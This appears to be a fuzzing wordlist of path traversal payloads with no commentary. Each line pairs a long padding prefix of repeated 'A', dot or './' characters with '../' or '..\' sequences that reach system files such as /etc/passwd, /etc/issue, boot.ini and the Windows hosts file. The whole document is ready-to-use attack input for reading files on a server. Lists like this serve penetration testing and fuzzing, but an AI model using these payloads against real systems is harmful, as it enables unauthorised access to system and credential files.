-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\windows\system32\drivers\etc\hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\..\etc\passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\..\etc\issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\..\boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..\..\..\..\..\..\windows\system32\drivers\etc\hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../windows/system32/drivers/etc/hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../windows/system32/drivers/etc/hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../windows/system32/drivers/etc/hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../windows/system32/drivers/etc/hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../windows/system32/drivers/etc/hosts -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../../etc/passwd -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../../etc/issue -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../../boot.ini -................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../../../../../../windows/system32/drivers/etc/hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\windows\system32\drivers\etc\hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\windows\system32\drivers\etc\hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\windows\system32\drivers\etc\hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\windows\system32\drivers\etc\hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\windows\system32\drivers\etc\hosts -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\..\etc\passwd -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\..\etc\issue -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\..\boot.ini -..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\..\..\..\..\..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../etc/issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../windows/system32/drivers/etc/hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\etc\passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\etc\passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\etc\issue -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\windows\system32\drivers\etc\hosts -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..\..\..\etc\passwd 